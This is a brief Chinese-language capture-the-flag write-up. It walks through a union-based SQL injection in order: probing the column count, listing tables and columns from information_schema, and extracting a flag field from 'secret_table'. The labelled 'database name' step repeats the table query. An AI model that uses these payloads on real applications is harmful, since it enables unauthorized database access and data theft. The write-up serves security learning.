这道题就是简单的sql注入
1.爆列的字段量,当为4的时候报错
' order by 3#
2.爆库名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
3.爆表名:
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
4.爆列名:
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'#
5.爆flag:
1' union select 1,fl4g,3 from secret_table#
总结:
简单的SQL注入